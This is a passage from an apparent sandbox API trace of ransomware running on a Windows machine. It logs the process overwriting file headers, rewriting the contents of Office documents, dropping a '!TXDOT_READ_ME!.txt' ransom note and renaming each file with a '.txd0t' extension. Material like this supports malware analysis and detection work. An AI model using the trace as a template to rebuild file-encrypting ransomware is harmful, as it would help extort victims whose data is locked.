"c:\\users\\fd1hvy\\documents\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0073.949] WriteFile (in: hFile=0x468, lpBuffer=0x4a9f734*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4a9f730, lpOverlapped=0x0 | out: lpBuffer=0x4a9f734*, lpNumberOfBytesWritten=0x4a9f730*=0x2, lpOverlapped=0x0) returned 1 [0073.950] FlushFileBuffers (hFile=0x468) returned 1 [0073.956] WriteFile (in: hFile=0x468, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x4a9f730, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x4a9f730*=0x7f0, lpOverlapped=0x0) returned 1 [0073.958] FlushFileBuffers (hFile=0x468) returned 1 [0073.965] CloseHandle (hObject=0x468) returned 1 [0073.965] GetProcessHeap () returned 0xe30000 [0073.965] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed28a0 | out: hHeap=0xe30000) returned 1 [0073.965] CloseHandle (hObject=0x47c) returned 1 [0073.967] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\-nk0jwf_dtix7ofnm.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\-nk0jwf_dtix7ofnm.xlsx.txd0t")) returned 1 [0073.967] SetEvent (hEvent=0x40c) returned 1 [0073.967] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0073.972] StrCpyW (in: psz1=0x4a9f750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx" [0073.972] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx.txd0t" [0073.972] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx.txd0t") returned 0 [0073.972] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx", dwFileAttributes=0x80) returned 1 [0073.972] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx" (normalized: "c:\\users\\fd1hvy\\documents\\4osjqkcx.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0073.972] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=79163) returned 1 [0073.972] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.972] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0073.973] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffec8c5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.974] ReadFile (in: hFile=0x46c, lpBuffer=0x415b020, nNumberOfBytesToRead=0x13530, lpNumberOfBytesRead=0x4a9f710, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f710*=0x13530, lpOverlapped=0x0) returned 1 [0073.975] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffecad0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.975] WriteFile (in: hFile=0x46c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x13530, lpNumberOfBytesWritten=0x4a9f714, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f714*=0x13530, lpOverlapped=0x0) returned 1 [0073.975] FlushFileBuffers (hFile=0x46c) returned 1 [0073.982] GetProcessHeap () returned 0xe30000 [0073.982] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfe) returned 0xecf078 [0073.982] StrCpyW (in: psz1=0xecf078, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx" [0073.982] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx") returned="4oSJqKCx.docx" [0073.982] StrCpyW (in: psz1=0xecf0b4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.982] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0073.982] GetProcessHeap () returned 0xe30000 [0073.982] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf078 | out: hHeap=0xe30000) returned 1 [0073.982] CloseHandle (hObject=0x46c) returned 1 [0073.985] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx" (normalized: "c:\\users\\fd1hvy\\documents\\4osjqkcx.docx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\4osjqkcx.docx.txd0t")) returned 1 [0073.985] SetEvent (hEvent=0x40c) returned 1 [0073.985] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0073.987] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt" [0073.987] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t" [0073.987] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t") returned 0 [0073.987] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt", dwFileAttributes=0x80) returned 1 [0074.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\7d9vj0y5f9llsokq2php.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0074.004] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=79425) returned 1 [0074.004] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.004] WriteFile (in: hFile=0x47c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0074.010] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffec7bf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.010] ReadFile (in: hFile=0x47c, lpBuffer=0x415b020, nNumberOfBytesToRead=0x13640, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x13640, lpOverlapped=0x0) returned 1 [0074.011] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffec9c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.011] WriteFile (in: hFile=0x47c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x13640, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x13640, lpOverlapped=0x0) returned 1 [0074.018] FlushFileBuffers (hFile=0x47c) returned 1 [0074.029] GetProcessHeap () returned 0xe30000 [0074.029] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x114) returned 0xed1ec0 [0074.029] StrCpyW (in: psz1=0xed1ec0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt" [0074.029] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt") returned="7d9vJ0y5f9LLSOKq2PHP.ppt" [0074.029] StrCpyW (in: psz1=0xed1efc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.029] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.030] GetProcessHeap () returned 0xe30000 [0074.030] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1ec0 | out: hHeap=0xe30000) returned 1 [0074.030] CloseHandle (hObject=0x47c) returned 1 [0074.032] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\7d9vj0y5f9llsokq2php.ppt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\7d9vj0y5f9llsokq2php.ppt.txd0t")) returned 1 [0074.032] SetEvent (hEvent=0x40c) returned 1 [0074.032] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0074.049] StrCpyW (in: psz1=0x4a9f750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx" [0074.049] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx.txd0t" [0074.049] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx.txd0t") returned 0 [0074.049] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx", dwFileAttributes=0x80) returned 1 [0074.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\csjfe8d.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0074.049] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=97993) returned 1 [0074.049] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.049] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0074.050] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffe7f37, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.050] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0x17ec0, lpNumberOfBytesRead=0x4a9f710, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f710*=0x17ec0, lpOverlapped=0x0) returned 1 [0074.053] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffe8140, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.053] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x17ec0, lpNumberOfBytesWritten=0x4a9f714, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f714*=0x17ec0, lpOverlapped=0x0) returned 1 [0074.053] FlushFileBuffers (hFile=0x460) returned 1 [0074.068] GetProcessHeap () returned 0xe30000 [0074.068] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfc) returned 0xecfac8 [0074.068] StrCpyW (in: psz1=0xecfac8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx" [0074.068] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx") returned="CsjFe8d.pptx" [0074.068] StrCpyW (in: psz1=0xecfb04, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.068] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.068] GetProcessHeap () returned 0xe30000 [0074.068] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecfac8 | out: hHeap=0xe30000) returned 1 [0074.068] CloseHandle (hObject=0x460) returned 1 [0074.071] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\csjfe8d.pptx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\csjfe8d.pptx.txd0t")) returned 1 [0074.071] SetEvent (hEvent=0x40c) returned 1 [0074.071] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0074.089] StrCpyW (in: psz1=0x4a9f750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx" [0074.089] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx.txd0t" [0074.089] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx.txd0t") returned 0 [0074.089] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx", dwFileAttributes=0x80) returned 1 [0074.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lzf-_9_.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0074.089] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=101666) returned 1 [0074.089] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.089] WriteFile (in: hFile=0x464, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0074.091] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffe70de, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.091] ReadFile (in: hFile=0x464, lpBuffer=0x415b020, nNumberOfBytesToRead=0x18d20, lpNumberOfBytesRead=0x4a9f710, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f710*=0x18d20, lpOverlapped=0x0) returned 1 [0074.094] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffe72e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.094] WriteFile (in: hFile=0x464, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x18d20, lpNumberOfBytesWritten=0x4a9f714, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f714*=0x18d20, lpOverlapped=0x0) returned 1 [0074.094] FlushFileBuffers (hFile=0x464) returned 1 [0074.284] GetProcessHeap () returned 0xe30000 [0074.284] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfc) returned 0xecf078 [0074.284] StrCpyW (in: psz1=0xecf078, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx" [0074.284] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx") returned="lzf-_9_.pptx" [0074.284] StrCpyW (in: psz1=0xecf0b4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.284] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.284] GetProcessHeap () returned 0xe30000 [0074.284] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf078 | out: hHeap=0xe30000) returned 1 [0074.284] CloseHandle (hObject=0x464) returned 1 [0074.287] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lzf-_9_.pptx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\lzf-_9_.pptx.txd0t")) returned 1 [0074.288] SetEvent (hEvent=0x40c) returned 1 [0074.288] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0074.290] StrCpyW (in: psz1=0x4a9f750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx" [0074.290] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx.txd0t" [0074.290] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx.txd0t") returned 0 [0074.290] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx", dwFileAttributes=0x80) returned 1 [0074.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx" (normalized: "c:\\users\\fd1hvy\\documents\\mrcnfzewvmw.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0074.290] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=25049) returned 1 [0074.290] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.291] WriteFile (in: hFile=0x464, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0074.291] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffff9c27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.291] ReadFile (in: hFile=0x464, lpBuffer=0x415b020, nNumberOfBytesToRead=0x61d0, lpNumberOfBytesRead=0x4a9f710, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f710*=0x61d0, lpOverlapped=0x0) returned 1 [0074.292] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffff9e30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.292] WriteFile (in: hFile=0x464, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x61d0, lpNumberOfBytesWritten=0x4a9f714, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f714*=0x61d0, lpOverlapped=0x0) returned 1 [0074.292] FlushFileBuffers (hFile=0x464) returned 1 [0074.306] GetProcessHeap () returned 0xe30000 [0074.306] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x104) returned 0xe9d750 [0074.307] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx" [0074.307] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx") returned="MRcnfzewVmw.docx" [0074.307] StrCpyW (in: psz1=0xe9d78c, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.307] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.307] GetProcessHeap () returned 0xe30000 [0074.307] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0074.307] CloseHandle (hObject=0x464) returned 1 [0074.308] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx" (normalized: "c:\\users\\fd1hvy\\documents\\mrcnfzewvmw.docx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\mrcnfzewvmw.docx.txd0t")) returned 1 [0074.309] SetEvent (hEvent=0x40c) returned 1 [0074.309] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0074.319] StrCpyW (in: psz1=0x4a9f750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx" [0074.319] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx.txd0t" [0074.320] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx.txd0t") returned 0 [0074.320] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx", dwFileAttributes=0x80) returned 1 [0074.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx" (normalized: "c:\\users\\fd1hvy\\documents\\qqnuwmakq.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0074.320] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=31576) returned 1 [0074.320] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.320] WriteFile (in: hFile=0x468, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0074.321] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff82a8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.321] ReadFile (in: hFile=0x468, lpBuffer=0x415b020, nNumberOfBytesToRead=0x7b50, lpNumberOfBytesRead=0x4a9f710, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f710*=0x7b50, lpOverlapped=0x0) returned 1 [0074.322] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff84b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.322] WriteFile (in: hFile=0x468, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x7b50, lpNumberOfBytesWritten=0x4a9f714, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f714*=0x7b50, lpOverlapped=0x0) returned 1 [0074.322] FlushFileBuffers (hFile=0x468) returned 1 [0074.340] GetProcessHeap () returned 0xe30000 [0074.340] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x100) returned 0xecfbd0 [0074.340] StrCpyW (in: psz1=0xecfbd0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx" [0074.340] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx") returned="QQnuWmakq.docx" [0074.340] 